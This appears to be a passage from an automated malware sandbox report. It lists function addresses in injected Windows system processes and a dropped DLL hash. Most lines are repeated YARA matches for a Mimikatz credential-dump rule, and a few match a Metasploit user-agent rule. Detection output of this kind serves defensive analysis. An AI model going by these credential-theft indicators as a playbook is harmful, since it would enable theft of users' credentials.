      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FBDF9E21_2_02FBDF9E
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FB071021_2_02FB0710
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FA1C3E21_2_02FA1C3E
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FAC41021_2_02FAC410
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FA9D9021_2_02FA9D90
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FACD8021_2_02FACD80
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FADD1021_2_02FADD10
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FA251021_2_02FA2510
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_0286F4E023_2_0286F4E0
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_028832CF23_2_028832CF
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_0287DAF023_2_0287DAF0
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_0286127023_2_02861270
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_0286D88023_2_0286D880
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_0287506323_2_02875063
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_02861E8D23_2_02861E8D
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_028626B023_2_028626B0
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_028636F023_2_028636F0
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_0287DF9E23_2_0287DF9E
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_02863FB023_2_02863FB0
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_028617C023_2_028617C0
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_0287071023_2_02870710
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_0286C41023_2_0286C410
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_02861C3E23_2_02861C3E
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_0286CD8023_2_0286CD80
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_02869D9023_2_02869D90
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_0286DD1023_2_0286DD10
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_0286251023_2_02862510
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E0F4E024_2_02E0F4E0
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E1DAF024_2_02E1DAF0
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E232CF24_2_02E232CF
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E0127024_2_02E01270
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E0D88024_2_02E0D880
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E1506324_2_02E15063
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E036F024_2_02E036F0
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E026B024_2_02E026B0
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E01E8D24_2_02E01E8D
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E017C024_2_02E017C0
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E03FB024_2_02E03FB0
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E1DF9E24_2_02E1DF9E
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E1071024_2_02E10710
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E01C3E24_2_02E01C3E
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E0C41024_2_02E0C410
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E0CD8024_2_02E0CD80
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E09D9024_2_02E09D90
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E0DD1024_2_02E0DD10
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E0251024_2_02E02510
      Source: C:\Windows\SysWOW64\svchost.exeProcess Stats: CPU usage > 98%
      Source: Joe Sandbox ViewDropped File: C:\Windows\NetworkDistribution\adfw-2.dll F06D02359666B763E189402B7FBF9DFA83BA6F4DA2E7D037B3F9AEBEFD2D5A45
      Source: wuauclt.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
      Source: 23.2.dllhost.exe.28a2c68.1.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b82a68.60.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f37468.18.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 33.0.ctfmon.exe.7c7468.4.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 29.0.svchost.exe.8d7468.4.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 35.0.svchost.exe.862c68.1.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 28.2.WUDHostServices.exe.c0000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 24.0.dllhost.exe.2e42c68.2.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 21.0.SearchProtocolHost.exe.2fd7468.4.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 23.0.dllhost.exe.2897468.4.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 21.0.SearchProtocolHost.exe.2fd7468.4.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b82a68.47.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b82a68.26.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 23.2.dllhost.exe.28a2c68.1.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 24.0.dllhost.exe.2e42c68.5.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.57c2c68.1.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 15.0.ctfmon.exe.997468.5.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f42c68.39.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 27.0.svchost.exe.522c68.5.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.2.svchost.exe.30b5240.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Metasploit_Framework_UA date = 2018-08-16, author = Florian Roth, description = Detects User Agent used in Metasploit Framework, reference = https://github.com/rapid7/metasploit-framework/commit/12a6d67be48527f5d3987e40cac2a0cbb4ab6ce7, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 1743e1bd4176ffb62a1a0503a0d76033752f8bd34f6f09db85c2979c04bbdd29
      Source: 2.3.svchost.exe.4b42000.34.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 29.0.svchost.exe.8a0000.3.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f00000.6.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 21.2.SearchProtocolHost.exe.2fa0000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b42000.3.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f37468.7.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b77268.35.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 35.0.svchost.exe.857468.2.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 21.2.SearchProtocolHost.exe.2fd7468.2.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 24.0.dllhost.exe.2e37468.1.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.2.svchost.exe.3079000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Metasploit_Framework_UA date = 2018-08-16, author = Florian Roth, description = Detects User Agent used in Metasploit Framework, reference = https://github.com/rapid7/metasploit-framework/commit/12a6d67be48527f5d3987e40cac2a0cbb4ab6ce7, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 1743e1bd4176ffb62a1a0503a0d76033752f8bd34f6f09db85c2979c04bbdd29
